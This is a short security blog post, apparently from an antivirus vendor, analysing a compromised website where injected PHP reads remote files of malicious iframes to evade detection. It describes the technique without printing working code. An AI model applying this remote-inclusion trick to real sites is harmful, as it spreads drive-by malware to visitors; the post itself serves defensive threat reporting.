An iframe alternative

Regular readers of our blog will be familiar with the use of malicious scripts (typically Javascript) and iframe tags for compromising legitimate sites in order to silently load malicious content when a victim browses the page.

Whilst investigating one of the compromised sites involved in a web attack uncovered this week, I noticed some PHP scripts that had been added to the page.

[PHP within compromised page]

You can see the start of an obfuscated malicious script that was added in the attack (detected as Troj/Unif-B). But above that, are several PHP additions, each one using the file_get_contents() function to read the contents of a remote file, before echoing it back to the page. For this method to succeed, the allow_url_fopen configuration option within the PHP configuration on the compromised site has to be enabled (it is by default).

Perhaps unsurprisingly, the text files loaded by the PHP contain a list of malicious iframes. So, to the victim, the effect is much the same – browsing the page results in the loading of malicious content from multiple domains. For security vendors, this is just another little trick used by the bad guys in order to evade detection.